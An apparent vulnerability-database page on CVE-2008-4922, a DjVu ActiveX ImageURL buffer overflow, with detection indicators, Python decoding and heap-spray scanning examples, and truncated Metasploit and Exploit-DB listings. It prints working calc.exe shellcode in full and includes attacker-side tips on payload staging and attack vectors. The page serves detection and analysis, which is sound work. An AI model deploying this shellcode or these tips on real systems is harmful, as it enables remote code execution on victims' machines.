CVE-2008-4922
Published 2008-11-04
Priority P3 (51) · critical · CVSS 2.0 base score 9.3
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C (network, medium complexity, no authentication, complete confidentiality/integrity/availability impact)
Exploit: public exploit available (see Exploit-DB and Metasploit entries below)
EPSS: 32.75% (98.1st percentile)
Buffer overflow in the DjVu ActiveX Control 3.0 for Microsoft Office (DjVu_ActiveX_MSOffice.dll) allows remote attackers to execute arbitrary code via a long (1) ImageURL property, and possibly the (2) Mode, (3) Page, or (4) Zoom properties.
Detection & IOCs (extracted from sources)
Shellcode bytes (JavaScript %u-escaped, from the Exploit-DB PoC; the trailing code units decode to the ASCII string calc.exe):
%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C%u652E%u6578%u9000
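As an added example (not code from the page's sources or from the PoC author), the block below decodes that blob the way the browser's unescape() and a heap spray lay it out in memory, then runs the quick static checks worth applying to any such IOC: the decoded bytes open with pushad and a "call $+5 / pop ebp" GetPC stub, they contain null bytes (which a sprayed JavaScript string can carry without trouble, so the \x00 restriction listed for the Metasploit module below must not be assumed for PoC payloads), and they end with the ASCII string calc.exe, matching the PoC's comment. The escaped string is copied verbatim from the entry above; the offsets and heuristics are the example's own.

```python
# Added example, not part of the page or of the Exploit-DB PoC: decode a
# JavaScript %uXXXX shellcode blob the way a heap spray lays it out in memory
# and run the cheap static checks an analyst applies to such an IOC.
import re

# The escaped shellcode from the Detection & IOCs entry above (the PoC's
# calc.exe payload), copied verbatim.
SHELLCODE_ESCAPED = (
    "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800"
    "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A"
    "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350"
    "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40"
    "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000"
    "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040"
    "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD"
    "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40"
    "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18"
    "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0"
    "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B"
    "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24"
    "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9"
    "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C"
    "%u652E%u6578%u9000"
)

_UNIT = re.compile(r"%u([0-9A-Fa-f]{4})")
_GETPC = b"\xe8\x00\x00\x00\x00"   # call $+5, the usual GetPC stub


def decode_unescape(escaped: str) -> bytes:
    """Mirror JavaScript unescape() for a pure %uXXXX string: each escape is
    one UTF-16 code unit, which the sprayed string stores little-endian."""
    out = bytearray()
    pos = 0
    for m in _UNIT.finditer(escaped):
        if m.start() != pos:
            raise ValueError(f"non-%u text at offset {pos}")
        out += int(m.group(1), 16).to_bytes(2, "little")
        pos = m.end()
    if pos != len(escaped):
        raise ValueError(f"trailing text at offset {pos}")
    return bytes(out)


def find_getpc(sc: bytes) -> int:
    """Offset of 'call $+5; pop reg' (E8 00 00 00 00 58..5F), or -1 if absent."""
    i = sc.find(_GETPC)
    while i != -1:
        nxt = i + len(_GETPC)
        if nxt < len(sc) and 0x58 <= sc[nxt] <= 0x5F:
            return i
        i = sc.find(_GETPC, i + 1)
    return -1


def printable_strings(sc: bytes, min_len: int = 4) -> list:
    """ASCII runs of at least min_len bytes, e.g. the dropped program name."""
    pat = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pat, sc)]


def triage(escaped: str) -> dict:
    """Summary an analyst wants before touching a debugger."""
    sc = decode_unescape(escaped)
    return {
        "length": len(sc),
        "null_bytes": sc.count(0),          # nulls are fine in a sprayed JS string
        "getpc_offset": find_getpc(sc),
        "strings": printable_strings(sc),
    }


if __name__ == "__main__":
    for key, value in triage(SHELLCODE_ESCAPED).items():
        print(f"{key}: {value}")
```

The byte order matters: %uE860 is one code unit and lands in memory as 60 E8, so a pattern match written against the escaped text would miss the raw bytes a memory scanner sees.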
- Detect heap spray targeting address 0x0a0a0a0a with 4MB heap blocks; monitor JavaScript allocating large arrays of repeated NOP sleds followed by shellcode in browser context.
- Monitor instantiation of the DjVu_ActiveX_MSOffice.dll ActiveX control in browser/Office context, especially when the ImageURL property is set to an overly long string.
- The control is not marked safe for scripting, so a default-configured Internet Explorer blocks or prompts before a page can script it; exploitation needs a zone or security setting that permits it, or a user who accepts the prompt. Alert on HTML pages that instantiate the control via OBJECT tags regardless, since that is the delivery attempt.
- Look for the NOP sled pattern %u9090%u9090 passed to unescape() together with large JavaScript string allocations in a loop, characteristic of heap-spray delivery for this exploit.
- The Metasploit module targets Windows XP SP0-SP3 and Windows Vista with IE 6.0 SP0-SP2 and IE 7 only; the heap-spray return address 0x0A0A0A0A is hardcoded for that target set and may not apply to other platforms.
- Payload space is limited to 1024 bytes, with \x00 as a bad character, so Metasploit-generated shellcode must avoid null bytes.
- EXITFUNC is set to 'process': when the payload finishes it calls ExitProcess, so the hosting browser or Office process dies instead of continuing. Use a payload that migrates or stages early if the host needs to stay up after exploitation.
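The indicators above translate into a small static scanner; the one below is an added example, not a rule from any of the page's sources. It keys on the DLL name inside an OBJECT tag (assumption: real exploit pages reference the control's CLSID, which this page does not list, so a production rule should add it), treats any ImageURL literal of 1024 characters or more as "overly long" (an assumed threshold), and flags the %u9090 sled, unescape() and a string-growth loop together as heap-spray delivery. The three sample pages are constructed for the example; the first mimics the shape of the PoC.

```python
# Added example, not part of the page or of any vendor rule: a static scanner
# for the Detection & IOCs indicators above, run over constructed sample pages.
import re

# Names taken from the advisory text. The control's CLSID/ProgID is not on this
# page, so a production rule should key on it as well (assumption: omitted here).
DLL_NAME = "DjVu_ActiveX_MSOffice.dll"
PROPERTY = "ImageURL"
LONG_LITERAL = 1024          # assumed threshold for "overly long"; tune locally

OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.I)
PROP_ASSIGN = re.compile(r"\.%s\s*=(?!=)\s*([^;\n]+)" % PROPERTY, re.I)
NOP_SLED = re.compile(r"(?:%u9090){2,}", re.I)
UNESCAPE = re.compile(r"\bunescape\s*\(", re.I)
# A for/while statement with either a braced body or a single-statement body.
LOOP = re.compile(r"\b(?:for|while)\s*\([^)]*\)\s*(?:\{[^}]*\}|[^;{]*;)", re.S)
GROWTH = re.compile(r"\+=|\]\s*=(?!=)")   # string doubling or array fill


def findings(page: str) -> list:
    """Indicator names present in one HTML/JS page, in a fixed order."""
    hits = []
    if any(DLL_NAME.lower() in m.group().lower() for m in OBJECT_TAG.finditer(page)):
        hits.append("object_instantiates_djvu_control")
    for m in PROP_ASSIGN.finditer(page):
        rhs = m.group(1).strip()
        lit = re.fullmatch(r"(['\"])(.*)\1", rhs)
        if lit is None:
            hits.append("imageurl_dynamic_value")      # built in script: inspect
        elif len(lit.group(2)) >= LONG_LITERAL:
            hits.append("imageurl_long_literal")
    spray_loop = any(GROWTH.search(m.group()) for m in LOOP.finditer(page))
    if NOP_SLED.search(page) and UNESCAPE.search(page) and spray_loop:
        hits.append("heap_spray")
    return hits


def verdict(page: str) -> str:
    """Collapse the findings into a triage label."""
    f = set(findings(page))
    if "heap_spray" in f or "imageurl_long_literal" in f:
        return "exploit-like"
    if "object_instantiates_djvu_control" in f and "imageurl_dynamic_value" in f:
        return "suspicious"
    return "review" if f else "clean"


# Constructed samples (not captured traffic). The first mimics the PoC's shape.
EXPLOIT_PAGE = r"""
<object codebase="DjVu_ActiveX_MSOffice.dll" id="djvu"></object>
<script>
var shellcode = unescape("%uE860%u0000%u0000%u815D");
var nop = unescape("%u9090%u9090");
while (nop.length < 0x100000) nop += nop;
var mem = new Array();
for (var i = 0; i < 200; i++) { mem[i] = nop + shellcode; }
var buf = "";
while (buf.length < 4000) buf += "\x0a";
djvu.ImageURL = buf;
</script>
"""

BENIGN_PAGE = r"""
<object codebase="DjVu_ActiveX_MSOffice.dll" id="djvu"></object>
<script>djvu.ImageURL = "http://intranet.example/report.djvu";</script>
"""

UNRELATED_PAGE = r"""
<html><body><p>Nothing to see here.</p>
<script>var s = unescape("%u0041");</script></body></html>
"""

if __name__ == "__main__":
    for name, page in [("exploit", EXPLOIT_PAGE), ("benign", BENIGN_PAGE),
                       ("unrelated", UNRELATED_PAGE)]:
        print(name, verdict(page), findings(page))
```

A legitimate intranet page that embeds the control lands on "review" rather than "clean" on purpose: the OBJECT tag alone is the thing the advisory says to watch, and the long or script-built ImageURL value is what separates use from abuse.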
No detection rules found.
Exploit-DB
DjVu - 'DjVu_ActiveX_MSOffice.dll' ActiveX Component Buffer Overflow (Metasploit), exploitdb, 2010-09-25
---
```ruby
##
# $Id: djvu_imageurl.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow',
      'Description' => %q{
          This module exploits a stack buffer overflow in DjVu ActiveX Component. When sending an
        overly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0)
        an attacker may be able to execute arbitrary code. This control is not marked safe
        for scripting, so choose your attack vector accordingly.
      },
      # The remaining module metadata (author, references, payload constraints,
      # targets) and the exploit handler are cut off in this listing.
    ))
  end
end
```
Exploit-DB
DjVu - ActiveX Control 3.0 ImageURL Property Overflow, exploitdb, 2008-10-30
---
```javascript
// Snoop Security Research committee
// calc.exe
var shellcode = unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
// The listing is cut off in the source after "%u08AC%u"; the remaining code
// units are taken from the IOC byte sequence above, which is the same payload.
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000" );
// The rest of the PoC (control instantiation, heap spray, the long ImageURL
// assignment) is not reproduced in this listing.
```
Metasploit
DjVu DjVu_ActiveX_MSOffice.dll ActiveX Component Buffer Overflow (djvu_imageurl.rb)
This module exploits a stack buffer overflow in DjVu ActiveX Component. When sending an overly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.
No writeups or analysis indexed.
References
- http://securityreason.com/securityalert/4560
- http://www.securityfocus.com/bid/31987
- http://www.vupen.com/english/advisories/2008/2956
- https://exchange.xforce.ibmcloud.com/vulnerabilities/46214
- https://www.exploit-db.com/exploits/6878